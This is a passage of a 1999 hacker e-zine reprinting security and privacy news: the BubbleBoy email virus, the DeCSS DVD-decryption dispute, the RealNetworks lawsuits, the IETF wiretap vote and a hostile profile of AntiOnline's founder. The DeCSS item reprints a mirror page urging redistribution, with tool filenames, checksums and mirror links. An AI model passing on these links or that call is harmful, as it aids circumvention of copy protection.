"Enonymous Advisor" is a free internet utility that kicks in when one opens a web page that requests personal information. It shows the web site's rating, which is based on Enonymous' evaluation of the site's privacy policies, with regards to consumer privacy. (Big whoop. The problem is that there are no laws. Companies are free to write one thing in the policy and then do another, or change the policy at anytime without notifying users.)

Star Tribune
http://www.startribune.com/stOnLine/cgi-bin/article?thisSlug=TECR10&date=10-Nov-1999

FYI: New firm offers privacy alerts

Enonymous.com wants to give Web surfers a more complete picture of exactly how sites that collect data from users plan to use their names, e-mail addresses and any other data they collect. The company is distributing a free Internet utility called Enonymous Advisor. A computer equipped with the Advisor, which can be downloaded from http://www.enonymous.com , detects sites that request personal information. When a fill-in-the-blank form is opened on a user's Web browser, a window pops up with information about how the site rates on consumer privacy. The ratings are based on Enonymous' evaluation of the site's privacy policies.
Amazon.com, Yahoo.com and Expedia.com are among about two dozen sites receiving one star each -- the lowest rank, which means that the site may share personal data without permission. The maximum rating is four stars. For example, Amazon.com's privacy policy states that it "does not sell, trade, or rent your personal information to others," but adds, "We may choose to do so in the future with trustworthy third parties, but you can tell us not to by sending a blank e-mail message to never@amazon.com." Amazon spokesman Paul Capelli said, "I think our policy is clearly defined, and that our customers are comfortable with it." Enonymous.com awarded four stars to sites such as eBay.com, AOL.com and Hotmail.com, which share users' information only with their permission and will contact them, via e-mail or otherwise, only with their permission. In the next year Enonymous plans to create the online equivalent of anonymous post-office boxes for people who want to receive ads without giving out their e-mail addresses.

-- New York Times

The Net Web hits

http://www.daytradingfirms.com Still in its infancy, day trading can be a lucrative -- and volatile -- way to exploit the stock market. This site links to several firms that provide training and help execute day trades.

-- Tribune Media Services

@HWA

35.0 CypherPunks to Host Echelon Discussion
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

The next physical meeting of the San Francisco Bay Area Cypherpunks will feature Echelon, the almost mythical global eavesdropping network. The meeting will feature a presentation by Duncan Campbell, who is considered by many to be the civilian expert on this topic. The meeting will be held on November 13, 1999.
It is free and is open to the public.

CypherPunks Meeting
http://www.freedomfighter.net/cypherpunks/991113.html

@HWA

36.0 Cable And Wireless Optus Drops Legal Action Against Surfers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by marena

Australia's largest ISP, Cable and Wireless Optus, suffered what they called "an unauthorized intrusion" and proceeded to file charges against seven people who had viewed user names and passwords on their site. The Web surfers claimed that there was no intrusion and that they had accidentally stumbled across an insecure web page. A page that had been left available to the public since last February.

Australian Broadcasting Company
http://www.abc.net.au/news/science/internet/1999/11/item19991110200840_1.htm

Optus drops legal action against hackers

One of Australia's largest Internet Service Providers has dropped legal action against a small group of its users who stumbled onto a site that detailed all the passwords of the company's clients. Cable and Wireless Optus launched the legal action against seven people, including an international-level tennis umpire and students studying for their HSC. The company described the discovery last week as "an unauthorised intrusion", but the defendants say they were just web surfers who stumbled across an unsecured web page. They say the file listing the password in plain text had been available to anyone with a web browser since February, and the discovery was not part of a "hack" of the Optus system. The company, which operates the Optusnet, Microplex and DingoBlue services, today dropped legal action against two of the defendants, and says it will be seeking agreement with the other five to do the same. The terms of the settlement remain confidential, but they do not include compensation to the defendants who had their Internet accounts blocked and, in some cases, their computers seized.
The company concedes that the legal action, and the lack of security on the password site, were not good publicity, but says other customers would feel grateful for the company's actions. A spokeswoman says customers' peace of mind is the major concern with any form of intrusion, and she is confident the company had done the 'right thing', even though some observers see the actions as heavy-handed.

@HWA

37.0 BubbleBoy Virus Uses HTML
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by scores

By viewing this new virus, named Bubbleboy, on the inbox screen of Microsoft's Outlook Express or other web based email clients a user will become infected. It is no longer necessary to open an attachment. Network Associates has posted a new virus definition that stops the virus. (This virus has not yet been reported as infecting anyone, is not destructive, has a patch available and it has been given a low threat rating. But one new feature and it makes all the news sites. Hmmmm, sensational?)

C|Net
http://news.cnet.com/news/0-1006-200-1433792.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f

MSNBC
http://www.msnbc.com/news/333265.asp

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500055552-500091363-500335153-0,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1018067,00.html?chkpt=zdnntop

C|Net;

New, fast-spreading email virus found
By John Borland
Staff Writer, CNET News.com
November 9, 1999, 3:15 p.m. PT

update A virulent new kind of computer virus triggered simply by opening an infected email message has been identified, antivirus researchers said today. The virus, dubbed "Bubbleboy," apparently hasn't yet made it onto the open Internet, which means researchers haven't heard of any computers being infected. But a version of the program was mailed anonymously to researchers last night, indicating a high potential for future infections.
The virus strikes a Seinfeld theme, changing the victim's computer's registered owner to "Bubbleboy," a reference to an episode of the former popular TV show. There are other references to the show in the program: Users' company information is changed to "Vandelay Industries," and "Soup Nazi" also appears in the source code. It appears in mailboxes with a subject line "Bubbleboy is back," researchers said. The virus marks a dangerous step forward in the trend of using email to attack remote computers, researchers say. As with several earlier similar fast-spreading viruses, it takes advantage of security holes in Microsoft Outlook email software to run an unauthorized program on victims' computers, changing information and emailing itself to new targets. Those viruses need a user to click on an email "attachment" in order to be triggered, however. By contrast, Bubbleboy runs as soon as an Outlook user opens an infected email, or even when an Outlook Express user previews a message. "If this got into the wild, it would spread incredibly quickly," said Dan Schrader, an antivirus researcher with Trend Micro. "This would make Melissa look slow." Melissa was successful largely because it automatically sent copies of itself to unsuspecting users via Outlook. Antivirus software initially failed to detect the virus, although Melissa ultimately proved a financial bonanza for antivirus companies. Fears of an even more quickly spreading threat could prompt another surge in antivirus software sales. The new virus requires a user to be running Microsoft's Outlook email program, Windows 95, 98, or 2000, and Internet Explorer 5.0 or higher. It targets a security hole for which Microsoft has already created a fix, but which many users still have yet to use, researchers say. Microsoft did not have a comment on the virus by press time. The development marks a dangerous--if widely predicted--step in virus technology, researchers say. 
Nevertheless, Bubbleboy itself is relatively benign, aside from its mass email effects. But more malicious programs, carrying effects such as deleting files or programs from a victim's computer, could also theoretically be included in this kind of virus. This style of virus could also be used for more targeted attacks, researchers said. This could include sending programs designed to do specific tasks--such as emailing the contents of an inbox to a third party--to a specific individual. "We used to say that as long as you didn't open an email attachment from someone you don't know, you were fine," said Sal Viveros, group marketing manager for the antivirus division of Network Associates. "Now we've come to the point where you must use antivirus protection if you're going to use email."

The patch provided by Microsoft will protect users from this version of Bubbleboy. Antivirus software that scans emails as they come through an ISP or corporate network will also stop the program, as soon as the antivirus companies finish their analysis and update their programs with a filter. Researchers at Network Associates say they suspect the same author who created the recent VBS.Freelink attack. Viveros said his company notified Microsoft and the Federal Bureau of Investigation last night. The companies stress that it is still a potential, rather than an imminent, threat. "We have not seen any instances of infection at all," Trend Micro's Schrader said. "This is not something that people should be panicking over. But it is kind of scary."

@HWA

38.0 DVD Decrypters Sued - DeCSS Labeled A 'Good Thing'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench and jmaier

At least two programmers involved in creating the DeCSS DVD decryption utility have been contacted by motion picture industry lawyers and have been asked to remove the information regarding the utility DeCSS from their Web sites.
Members of the Norwegian group "Masters of Reverse Engineering" who came up with the crack have complied with the lawyers' request since they can not afford the legal battle. At last count there were over 41 different mirrors in 8 different countries. It is unlikely that the lawyers will be able to shut them all down.

Wired
http://www.wired.com/news/politics/0,1283,32449,00.html

List of Mirror Sites
http://www.rhythm.cx/dvd/

Noted Cryptographer Bruce Schneier has called the recent breaking of the DVD encryption a 'good thing'. He goes on to talk about how the DVD encryption scheme was flawed from the start and that it was only a matter of time before someone figured out how to decrypt it.

ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html

Late Update 162515NOV99EST
The lawyers are doing what they can. The above list of mirrors has been taken down, however replacements have sprouted up.

Mirrored List of Mirrors #1
http://www.lemuria.org/DeCSS/

Mirrored List of Mirrors #2
http://www.humpin.org/decss/

Mirrored List of Mirrors #3
http://www.2600.com/news/1999/1112-files/www.rhythm.cx/

Wired;

DVD Hackers Headed to Court?
by Declan McCullagh

3:00 a.m. 10.Nov.1999 PST

If there's one thing entertainment industry lawyers don't like, it's someone copying CDs or DVDs. But what they really, truly detest are the upstart hackers who discovered how to copy DVD films -- and had the temerity to distribute a program that does just that. Motion picture industry lawyers have reportedly contacted at least two programmers involved in developing the DeCSS utility and asked them to delete information from their Web sites. One of the members of the Norwegian group "Masters of Reverse Engineering" said an Oslo attorney from Simonsen and Musæus, representing the movie industry, has demanded that he remove a link to DeCSS from his Web site. "I know very well that they would not win in court, but they could make a big mess out of it.
I simply do not have the time, nor money, to go up against these people," Jon Johansen announced in a letter he posted online Tuesday. He said he decided to yank the link. DVD's security system was intended to be hacker-proof, but MoRE recently figured out how to circumvent it -- a move that could open up illicit trading of digital movies and could cost the entertainment industry millions of dollars. The program, a tiny utility called DeCSS, allows knowledgeable users to copy any DVD movie to a .VOB file that ranges between 4.7 and 9.4 GB. Just in case the lawyers get even nastier, the Linux community has a not-so-secret weapon: Mirror sites. By late Tuesday, over a dozen activists had placed copies of DeCSS online, and an index site includes links to all of them.

In a post to a Linux-DVD mailing list Tuesday, Derek Fawcus disclaimed all responsibility for the project. "I will have nothing to do with work on DeCSS. If there is any work that I may be considered to have ownership of, I give up all rights to that work," he wrote. Fawcus told Wired News last week that he had rewritten some of the DVD decoder assembler code in the C programming language, and that code was later used in DeCSS. Fawcus wrote in a message last Friday that "the legal side has started" and said that he had been accused of violating a 1998 UK copyright act. That law restricts anyone who "publishes information intended to enable or assist persons to circumvent that form of copy protection." While the US Constitution's First Amendment would probably make such a law in America unenforceable, Congress is debating a controversial anti-circumvention law that would prevent people from decoding or removing security from files and bypassing the rights of copyright owners. Industry groups could not be reached Tuesday for comment. But the Japan-based DVD Forum recently issued a statement condemning the Linux hackers' exploits as "illegal and inappropriate."
-=- Mirror list -=-

Here is the most recent version of the css-auth CVS code as well as DeCSS. Please mirror & redistribute. This site has limited bandwidth, try to use a mirror first. Please mail additional mirrors and broken links to altair@rhythm.cx.

NOTE (Thu, Nov 11, 12:17pm EST): I've recently been informed that a law firm which is likely to be one that would try to get these mirrors taken down has been visiting this mirror site as well as others. With that said, there is a possibility that I may have to remove this site in the near future because like everyone else, I can't afford to go to court to fight it. Luckily, it seems fairly unlikely that any law firm will ever be able to get rid of all these mirrors at this point (there are currently 41 in 8 different countries and this list is growing every day). However, I have only seen very few mirror _lists_ like this one anyplace. If anyone has the resources, it might be wise to mirror this list of mirrors as well so that the right people will still know that these mirrors exist.

css-auth.tar.gz - The code from an open source DVD project.
DeCSS.zip - A Win32 binary for decrypting DVD data streams.

MD5 Sums:
5b8347b8b857f8470b8dbd9a905fc194 css-auth.tar.gz
d0aff684327a5c7bf110951e42ec3cae DeCSS.zip

The Md5 sum shown here for css-auth.tar.gz may be different from some other people's as I rebuilt this archive myself. It was originally downloaded from the main site as a zip file.
Page last updated: Fri, Nov 12, 2:55pm EST

Current Mirrors (49 so far):
This site contains some good technical documentation as well as more source code that the DVD consortium's lawyers would rather you not see: http://crypto.gq.nu/
Local Mirror: http://www.rhythm.cx/dvd/crypto.gq.nu

Broken Mirrors (These are listed here for the notification of the people who run them. I don't know who runs which mirrors; I delete their email once I've added their site in order to ensure their anonymity in the event that the DVD consortium's lawyers start gnawing at my ankles as well.)

ftp://mikpos.dyndns.org/pub/cssdvd.zip

ZDnet;

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

DVD encryption break is a good thing
By Bruce Schneier, ZDNN
November 11, 1999 9:23 AM PT
URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html

The scheme to protect DVDs has been broken. There are now freeware programs on the Internet that remove the copy protection on DVDs, allowing them to be played, edited, and copied without restriction.

This should be no surprise to anyone, least of all to the entertainment industry.

The protection scheme is obviously flawed in several ways. Each DVD is encrypted with something called Content Scrambling System (CSS). It has a 40-bit key. (I have no idea why. The NSA and the FBI don't care about DVD encryption. There aren't any terrorist movies they need to be able to watch.) It's not even a very good algorithm. But even if the encryption were triple-DES, the scheme would be flawed.
Every DVD player, including hardware consoles that plug into your television and software players that you can download to your computer, has its own unique unlock key. This key is used to unlock the encryption key on the DVD. Every DVD has 400 copies of the same decryption key, each encrypted with every unlock code. Note the global secret: if you manage to get one unlock key, you can decrypt every DVD.

But even if this were all perfect, the scheme could never work.

The software player eventually gets the decryption key, decrypts the DVD, and displays it on the screen. That decrypted DVD data is on the computer. It has to be; there's no other way to display it on the screen. No matter how good the encryption scheme is, the DVD data is available in plaintext to anyone who can write a computer program to take it.

And so is the decryption key. The computer has to decrypt the DVD. The decryption key has to be in the computer. So the decryption key is available, in the clear, to anyone who knows where to look.

The DVD software manufacturers were supposed to disguise the decryption program, and the playing program, using some sort of software obfuscation techniques. These techniques have never worked for very long; they only seem to force hackers to spend a couple of extra weeks figuring out how the software works. I've written about this previously in relation to software copy protection; you can't obfuscate software.

It might be a bitter pill for the entertainment industry to swallow, but software content protection does not work. It cannot work. You can distribute encrypted content, but in order for it to be read, viewed, or listened to, it must be turned into plaintext. If it must be turned into plaintext, the computer must have a copy of the key and the algorithm to turn it into plaintext. A clever enough hacker with good enough debugging tools will always be able to reverse-engineer the algorithm, get the key, or just capture the plaintext after decryption.
And he can write a software program that allows others to do it automatically. This cannot be stopped.

If you have secure hardware, you can prevent it. The attack works because the hacker can run a debugger and other programming tools. If the decryption device and the viewing device (it must be both) are inside a tamperproof piece of hardware, the hacker is stuck. He can't reverse-engineer anything. But tamperproof hardware is largely a myth, so in reality this would just be another barrier that someone will eventually overcome.

One more lesson, and an observation.

The lesson: This is yet another example of an industry meeting in secret and designing a proprietary encryption algorithm that ends up being embarrassingly weak. I never understand why people don't use free, public, encryption algorithms. They're almost always better.

The observation: One solution that the entertainment industry has been pushing for is to make reverse-engineering illegal. They managed in the United States: the Digital Millennium Copyright Act includes provisions to this effect, despite the protests of the scientific and civil rights communities. (Yes, you can go to jail for possessing a debugger.) This "solution" does not work and makes no sense.

First, unless reverse-engineering is illegal everywhere on the planet, someone will be able to do it somewhere. And one person is all you need; he can write software that everyone else uses. Second, the reverse-engineer can--like in this case--work anonymously. Laws wouldn't have helped in this case. And third, laws can't put the cat back into the bag. Even if you could catch and prosecute the hackers who did this, it wouldn't affect the hacker tools that have already, and continue to be, written.

The fatal flaw is that the entertainment industry is lazy, and is attempting to find a technological solution to what is a legal problem.
It is illegal to steal copyrights and trademarks, whether it is a DVD movie, a magazine image, a Ralph Lauren shirt, or a Louis Vuitton handbag. This legal protection still exists, and is still strong. For some reason the entertainment industry has decided that it has a legal right to the protection of its technology, and that makes no sense.

This DVD break is a good thing. It serves no one's interests for the entertainment industry to put their faith in a bad security system. It is good research, illustrating how bad the encryption algorithm is and how poorly thought out the security model is. What is learned here can be applied to making future systems stronger.

Bruce Schneier is CTO of Counterpane Internet Security, Inc., based in San Jose, Calif.

@HWA

39.0 Class Action Suits Brought Against RealNetworks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond And Lamer
Two class action lawsuits, one in Pennsylvania and another in California, have been filed against RealNetworks. The suits allege that RealNetworks invaded users' privacy by collecting information about them without their knowledge when they used RealJukebox. Such collection of data allegedly violates the federal Computer Fraud and Abuse Act as well as California business statutes. The California lawsuit reportedly seeks compensatory and punitive damages of $500 per user.

Wired
http://www.wired.com/news/politics/0,1283,32459,00.html

South China Morning Post
http://www.technologypost.com/business/DAILY/19991110105842581.asp?Section=Main

Wired;

RealNetworks in Real Trouble
Wired News Report

9:15 a.m. 10.Nov.1999 PST
Internet music consumers took RealNetworks to court Wednesday over recently discovered user-tracking behavior in the company's Internet music software.
In a class-action suit filed in the Federal District Court for the Eastern District of Pennsylvania, the plaintiffs charged that RealNetworks violated federal and state law by misrepresenting the use and collection of personal data by users of the RealJukebox software.

"This action is being filed on behalf of the millions of users of the RealJukebox software to obtain compensation and other relief for the violations of federal and state law alleged in the complaint," said Jonathan Shub, a member of Pennsylvania law firm Sheller, Ludwig & Badey, in a statement. "RealNetworks must be held accountable for its conduct."

The suit accuses RealNetworks of assigning a GUID (global unique identifier) to each RealJukebox user without the user's knowledge, then compiling information about people's music-listening habits.

RealNetworks violated the federal Computer Fraud and Abuse Act as well as state privacy laws and consumer protection statutes, according to the complaint.

The action is similar to a suit filed last week in California against RealNetworks for invasion of privacy, trespass, and unfair competition.

The Pennsylvania plaintiffs want refunds for the software, and want RealNetworks to provide access to the information that it collected. The suit also asks the company to publish a remediation plan on its Web site.

The suits came following the recent discovery that as users listened to Internet music, the RealJukebox software was transmitting detailed user data back to the company.

South China Morning Post;

BUSINESS

RealNetworks slapped with privacy lawsuit

NEWSBYTES

Jeffrey Wilens wants RealNetworks to face the music, and he has gone to court in Santa Ana, California to make them do so.

According to the class-action lawsuit filed in the Orange County Superior Court, Wilens, an attorney who practices consumer protection law, alleges that RealNetworks violated California business statutes (Business & Professions Code, 17200, et seq.)
when it failed to pay users of RealJukebox the market value of the information it captured, or uploaded, from their computers.

RealNetworks has previously admitted that its RealJukebox assigned a personal ID number to users and uploaded information about their listening habits to its servers.

However, the company also released a patch to disable the ID number, and said that it used the data only for personalising the service and never sold it to third parties.

Mr Wilens is reported in InternetNews as having compared RealNetworks' actions in acquiring the information as the equivalent of home burglary.

The lawsuit reportedly seeks compensatory and punitive damages of $500 per user in the State of California. When extrapolated out, total damages, if Mr Wilens is successful, could reach US$500 million based on his estimate that one million of the more than 16 million RealJukebox users reside in California.

Jeffrey Spencer, the attorney handling Mr Wilens' case, said that the $550 per user figure was a "floor" figure as to the amount of damages, and that further discovery into RealNetworks' actions could significantly raise the amount of individual damages sought.

Punitive damages are being asked because it is alleged that the statements RealNetworks had made to consumers about use of their personal information were misleading.

Mr Spencer also said that his client would not have used RealJukebox if he had known that the Web site had the technology of collecting an extensive amount of personal data.

Mr Spencer said: "If they weren't using the information, why were they collecting it?" He indicated that he wants to find out exactly what uses were made of the information.

Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved.
@HWA

40.0 IETF Rejects Internet Wiretapping Proposals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Seventh Sign
The Internet Engineering Task Force, the ad-hoc group that decides Internet standards, has categorically rejected the idea of internet wiretaps. Of course companies that make routers and other hardware are still required to include legal wiretap capabilities into their products.

Wired
http://www.wired.com/news/politics/0,1283,32455,00.html

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13758,00.html

Wired;

IETF Says 'No Way' to Net Taps
by Declan McCullagh

3:00 a.m. 11.Nov.1999 PST
WASHINGTON -- The Internet's standards-setting body has decisively rejected the idea of Net wiretaps.

Members attending the Internet Engineering Task Force's meeting decided overwhelmingly on Wednesday not to provide wiretap capabilities for governments that want to conduct surveillance online.

After a surprisingly polite debate that lasted about an hour, fewer than 25 attendees of the roughly 800-person audience voted for the proposal. Hundreds raised their hands to object to it, while dozens abstained.

One common complaint was that inserting wiretap functionality into standards makes them less secure, something the IETF has long opposed.

"It would be like having the Christian Coalition debating a protocol for third-trimester abortions," said Phill Hallam-Baker, a networking security expert.

Many governments, including the United States, require telephone companies to configure their networks so police can easily wiretap calls. As more phone calls flow through the Internet, the FBI has asked the IETF to consider allowing similar lawful surveillance.

But the libertarian-leaning attendees would have none of it.

"This is not an area the IETF should be getting into," said Robert Moskowitz, the former chairman of an IETF security working group. "This is something that cannot be done right."
Two of the few people who spoke in favor of the concept came from Cisco, a company that could be required to support wiretapping -- whether or not the IETF makes the feature easy to implement.

"I'm a little concerned about [this anti-wiretap sentiment]. Clearly not all wiretapping is illegitimate," one Cisco engineer said.

"It is legal. It is the law. Most of our customers already require it," said Brian Rosen of Fore Systems, which builds networking hardware.

"We're going to take a protocol that is designed here and we're going to modify it. I assure you that a very large number of [companies] will implement the one with the tap," he said.

The Internet Engineering Steering Group and the Internet Architecture Board will publish a formal IETF position paper based on the rough consensus of the audience and the views expressed during the debate.

"It is the first round in what will prove to be a very long-running debate. It's a good starting point," said Jim Dempsey of the Center for Democracy and Technology.

-=-

From PC World Online

Just Say No to Wiretap Protocols

Internet group IETF rejects Net-watching as "repugnant," but wiretapping protocols already proliferate.

by Margret Johnston, IDG News Service
November 12, 1999, 12:05 a.m. PT

Should protocols be designed to help law enforcement officials wiretap the Internet? Members of the Internet Engineering Task Force, or IETF, say no. In an informal vote Wednesday night, the group overwhelmingly rejected adding protocols to support such action.

The vote came as a show of hands at the end of a discussion during a plenary meeting attended by about 2000 of the worldwide standards-setting body who have been meeting in Washington, D.C. all week.

The majority opinion may be clear. But the poll resolved only the political part of the debate, leaving the technical issues unanswered, according to the head of the task force.

"Clearly, there was a majority who found the concept of wiretapping repugnant," says Fred Baker, chairman of the IETF. But the IETF recognizes that existing protocol features used commercially, such as conference call bridges, could also be used by law enforcement for wiretapping, Baker says.

Members present did not agree that current U.S. law requires creating a protocol designed for wiretapping. But the FBI's interpretation is clear: engineers designing the protocols must build in wiretapping capability, according to Barry Smith, an agent at the FBI's Digital Telephony and Encryption Policy unit.

One reason is the Communications Assistance for Law Enforcement Act of 1994, which requires carriers to use systems that include wiretap capability. The act doesn't cover the Internet, but its reach is blurred as voice telephony moves to the Internet.

Privacy Groups Lobby

Members who participated in Wednesday night's discussion also expressed a range of opinions, often disagreeing with each other. One speaker declared designing protocols to assist wiretapping is "beyond state of the art" now. Another said whatever the IETF does could become irrelevant anyway if appealed to the Federal Communications Commission.

This week, the IETF received an open letter signed by 63 privacy advocates, computer security specialists, computer technology educators, lawyers, and executives, urging the group not to adopt new protocols to facilitate wiretapping. The letter says such a development will harm security, fail to prevent crime, and would be inconsistent with previous IETF actions.

When the vote came, only a few hands went up to the question, "Should the IETF support protocol features whose sole use is for wiretapping?" At least 60 percent of the members present voted no and the rest abstained.

"If there was any one consensus that came out last night, I would say it's that the IETF in a political sense, not a technical sense, finds the idea of invasion of privacy pretty unpalatable," Baker says. "That's not something we would like to make easy."

But Baker acknowledges there's more to the subject. IETF will issue a statement on the topic, probably within a future IETF communiqué on privacy, Baker says.

@HWA

41.0 John Vranesevich, AntiOnline, Slashdot and the Synthesis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bronc
Sometime today Slashdot.org will be publishing an interview with John Vranesevich of AntiOnline. The interview will consist of questions posted by Slashdot readers.

Slashdot.org
http://www.slashdot.org

Not sure who John Vranesevich is? Want to know what all the hubbub is about? Check out this new article by Bronc Buster who gives a fairly good chronological account of the events surrounding John Vranesevich and his site.

The Synthesis
http://www.thesynthesis.com/tech/antionline/index.html

And just in case you missed them the first time around here is some background information for you.

Forbes - Go Ahead and Sue
http://www.forbes.com/columnists/penenberg/1999/0927.htm

CyberWire Dispatch, August 1999 - Jacking in From the "Pine-Sol" Port
http://www.hackernews.com/orig/CWD0899.html

Ottawa Citizen - Spy vs. Spy in the Hacker Underworld
http://www.attrition.org/negation/ottawa.html

Letter from Ken Williams
http://www.hackernews.com/orig/williams.html

And so that people don't think we are playing favorites here is a positive article.

NY Times
http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html

Note: Many of these articles have been printed in these pages before, some have been reprinted here for reference purposes.
- Ed

The Synthesis
Article by bronc buster;

If you are familiar with the Internet I am sure you know that there are millions of sites online covering everything from how to change a flat tire to how to get rich quick. As you may also know, there are a ton of nuts out there, and self-proclaimed "kings of the Internet" who are online gods in their own minds. Well I am going to tell you a tale about John Vranesevich, or "JP," as he likes to be called online. JP runs a site called antionline.com, which he proclaims is a sort of headquarters for people fighting hackers around the world. He boasts on his web site about working closely with the U.S. Military, NASA, the Defense Information Systems Agency and the FBI to help track, stop and catch evil, criminal hackers. This is his mission, and he lets nothing and no one stand in his way. In his mind, JP stands supreme with a big bank account and ample resources to back him up. So, tell me if this sounds familiar to you: Have you ever gone into a "chat room" or got on IRC and witnessed a user getting mad and blubbering that they were going to "get" someone they were mad at? They might say that they know how to find out where that someone lived, like they were some sort of "Internet cop," and that they had some sort of mystical powers to get a person in big trouble if s/he didn't immediately stop whatever offensive actions s/he had perpetrated. If you have ever seen anything like this happen, then this story won't be a new one, just maybe a bit more complex and a bit more interesting. John "JP" Vranesevich started out in Pennsylvania, in a city that he says had very limited computer resources. He boasts that, when he was 15 years old, he was the driving force behind getting a computer lab upgraded from five to 75 computers. But wait a second; a little digging will produce three different quotes, instances in which he said three different things (see end of story for references).
First he said it was in a public library computer lab, and that he helped it grow from five to 75 computers; in another quote he said it was his old high school's computer lab, and it went from 50 to 600 computers. Once JP was out of high school, he moved on to the University of Pittsburgh, a fine institution of higher learning, enrolling in a computer science-related major. As all freshmen are required to, he had to live in the dorms at PITT, which are said to be some of the finest dorms in the country. They are wired with Ethernet connections giving students unlimited access to the Internet, which was ideal for a new student wanting to learn more in the field of computing sciences. As he entered school, JP also started a small personal Web site on an Internet account he got from a friend. Or was it an account from a local Internet Provider that he was given in thanks for helping set up that lab earlier? That point is also unclear; it appears he has claimed both. At any rate, this was the beginning of AntiOnline. Soon after he moved into the dorms and saw he had unlimited access to the Internet, he decided to move his project site into his room and started running antionline.com off of a small computer running Windows NT. Even though JP had signed an agreement to obey the rules regarding use of his Internet connection—rules which strictly forbid running any type of server like he was—he pushed ahead thinking he was protected by his right to freedom of speech. As he became a fledgling hacker wannabe in the underground community, JP started to make friends and because his unlimited access to the 'Net was so rare back then, he started to give out e-mail accounts, space for people to put up Web sites, and began trading in stories of the latest hacker exploits. I had an account on his box back then; in fact, I had several accounts.
However, in his conversations with the coordinator of residential computer services at Pitt, Lee Bannister, JP said he never did such things and that his server was just a personal box he experimented with. Needless to say, it didn't take long for the authorities at Pitt to see what JP was doing. After he was contacted by a group in Spain about releasing a new type of Windows attack (the infamous Win-Nuke) via his site, his traffic went up and the authorities took notice. At first they contacted JP and told him what he was doing was illegal and asked him politely to stop. He simply ignored the warning. Next they disconnected his room's Internet access and advised him to reread the agreement he had signed. JP ignored them and just moved his box to a friend's room, where he went back online. Then, after he was caught several times in the school's computer labs attempting to launch Denial of Service attacks against several Internet Service Providers across the country, he was brought up on charges regarding his use of dorm Internet access. JP was threatened with expulsion from Pitt. "What!?" cried JP. "They are restricting my freedom of speech!" His friends and hackers from across the underground community rallied to his aid—at the time, it reminded me of that really poor movie called Hackers, in which, at the end, hackers from around the globe unite to stop some evil company from taking over the world, or something like that. JP was invited to be a guest on a weekly hacker radio show in New York City called "Off The Hook," which is done by the fine people at 2600 Magazine. He was invited to talk about his problems at Pitt and people responded by e-mailing, calling and writing the authorities at Pitt who were doing this to poor JP. Soon the noise that the underground was making started to get noticed by the mainstream media and stories started popping up. 
Under the pressure of all the media attention, Pitt agreed to back down, but only if JP agreed to obey their rules from then on. He agreed. Only a few weeks later, the Internet access in JP's dorm room was cut off again, and again he started to complain about Pitt unjustly targeting him. He said that because of the way he was treated, he decided to drop out of school and work on AntiOnline full time. What a bold, brave move. After only one semester, at the tender age of 19, JP was quitting school, not wanting to bother with learning any longer and heading out with what he knew to take on the world. When I contacted Pitt several months ago, Lee Bannister told me the reason JP's Internet access was cut off was that he had again broken their rules and put his server back up in his dorm room. Ken Service, the spokesman for Pitt, said in a public statement that all the documents regarding his case were on file at Pitt, and said that the school "had really made a genuine effort to assist him [JP] in running the site within the policies and restrictions of the University." JP was still riding high on his chariot of fame when some of his friends told him about a hack they had done. He figured it would be cool to do a little story about how elite his pals were, and put up a little story on his site for everyone to read. After a few weeks, more people started telling JP of their exploits and soon AntiOnline was a regular stop for people who wanted to see the latest hack or the status of the latest online hacker gang war. Then one day, a story popped up about how hackers who JP knew had broken into several systems at an Indian nuclear research center and stolen documents and e-mails regarding recent nuclear tests conducted near the border of Pakistan. Because this was such a hot bed issue in the news at the time, the mainstream media jumped all over it.
JP recounted in several interviews how he was in his parents' living room fielding calls from everyone from the FBI to the Department of Defense to various nuclear research centers across the country. The next day JP was on the CBS News, quoted in the New York Times, talked about on CNN and was referred to by countless other media outlets. This was the chance that JP had hoped and waited for—finally, big-time exposure for him and his site. When he was later interviewed by Lewis Z. Koch, of the Cyber Wire Dispatch, regarding the validity of these events, JP incorrectly said that it was a research center in Israel that was hacked, and that he hadn't really witnessed any of the hacks himself, he was just going on the word of the 12- and 14-year-old kids who said they did it. JP never released any of the documents he said he was given, but somehow he had little snippets translated for him so he could post tidbits on his site. One day early last year, JP was contacted by some people who knew little about the fledgling Internet, and somehow decided that it would be a good idea to invest somewhere around $250,000 in JP and AntiOnline. Who would do such a thing and take such a risk? To tell the truth, no one is sure. According to an article in the New York Times, it was a large arts and crafts company in Ohio called Darice Inc., but when contacted, the company spokespeople said they had no idea who John Vranesevich was, and knew nothing about any Web site called antionline.com. When I informed Matt Richtel, the reporter who had done the New York Times story, that the name of the company he was given for his story was bogus, he asked me to ask JP. He wanted to know—as much as I did—if and why JP had lied. With the cash, JP got an office, set up some computers, got a high-speed connection to the Internet and hired an old friend to help run things. From there, he started to get sponsors, expand his empire and got people to write articles for him. 
